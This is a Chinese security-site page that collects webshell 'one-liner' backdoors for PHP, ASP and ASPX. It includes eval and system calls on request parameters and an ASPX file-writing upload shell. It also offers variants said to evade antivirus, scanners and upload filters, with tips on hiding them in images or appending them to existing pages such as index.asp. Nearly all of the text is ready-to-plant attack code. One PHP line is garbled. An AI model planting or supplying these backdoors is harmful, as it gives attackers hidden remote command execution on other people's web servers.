首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>网络安全>文章内容
asp,php,aspx一句话集合
来源:http://www.expsec.com 作者:ExpSec 发布时间:2012-02-02  

推荐还是把一句话加进图片里面去。

 

普通的php一句话:<?php @eval($_POST['r00ts']);?>

 

普通的asp一句话:<%eval(Request.Item["r00ts"],"unsafe");%>

 

aspx突破一流的:

<script language=VBScript runat=server>
dim da
set fso=server.createobject(“scripting.filesystemobject”)
path=request(“path”)
if path<>”" then
data=request(“da”)
set da=fso.createtextfile(path,true)
da.write data
if err=0 then
Response.Write “yes”
else
Response.Write “no”
end if
err.clear
end if
set da=nothing
set fos=nothing
Response.Write “<form action=” method=post>”
Response.Write “<input type=text name=path>”
Response.Write “<br>”
Response.Write “当前文件路径:”&server.mappath(request.servervariables(“script_name”))
Response.Write “<br>”
Response.Write “操作系统为:”&Request.ServerVariables(“OS”)
Response.Write “<br>”
Response.Write “WEB服务器版本为:”&Request.ServerVariables(“SERVER_SOFTWARE”)
Response.Write “<br>”
Response.Write “<textarea name=da cols=50 rows=10 width=30></textarea>”
Response.Write “<br>”
Response.Write “<input type=submit value=save>”
Response.Write “</form>”
</Script>

 

ASP一句话:<%IfRequest("1")<>""ThenExecuteGlobal(Request("1"))%>

 

PHP防杀放扫 一句话:<?php (])?> 

上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会出错,比如index.asp里面也是可以的!

 

因为加了判断!加了判断的PHP一句话,与上面的ASP一句话相同道理,也是可以插在任何PHP文件的最底部不会出错!<?if(isset($_POST['1'])){eval($_POST['1']);}?><?php system($_REQUEST[1]);?>

 

无防下载表,有防下载表可尝试插入以下语句突破的一句话

<%execute request("class")%><%'<% loop <%:%><%'<% loop <%:%><%execute request("class")%><%execute request("class")'<% loop <%:%>

 

备份专用<%eval(request("1")):response.end%>

 

asp一句话<%execute(request("1"))%>

 

 

 

aspx一句话:<scriptrunat="server">WebAdmin2Y.x.y aaaaa =newWebAdmin2Y.x.y("add6bb58e139be10");</script>

 

可以躲过雷客图的一句话。

<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")ms.Language="VBScript"ms.AddObject"Response",Responsems.AddObject"request", requestms.ExecuteStatement("ev"&"al(request(""1""))")%>

 

不用’<,>‘的asp一句话<scriptrunat=server>execute request("1")</script>

 

不用双引号的一句话。<%eval request(chr(35))%>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·一句话木马
·samcrypt.lib简介
·教你轻松查看QQ空间加密后的好友
·web sniffer 在线嗅探/online ht
·SPIKE与Peach Fuzzer相关知识
·Cisco PIX525 配置备忘
·用Iptables+Fedora做ADSL 路由器
·检查 Web 应用安全的几款开源免
·Md5(base64)加密与解密实战
·NT下动态切换进程分析笔记
·风险评估中的渗透测试
·QQ2009正式版SP4文本信息和文件
  相关文章
·常见 Webshell 的检测方法及检测
·浅谈Ddos攻击攻击与防御
·浅谈新型的sql注入测试
·Auto pentesting. Nmap, SSLscan
·Content-Type 防范 XSS 绕过
·PHP中的密码学算法及其应用2-对
·web sniffer 在线嗅探/online ht
·利用PHP编程防范XSS跨站脚本攻击
·网络游戏安全小议(端游/页游/手
·Web开发框架安全杂谈
·记录一次网站被黑抓马记
·从真实故事说起 读黑客战术社会
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved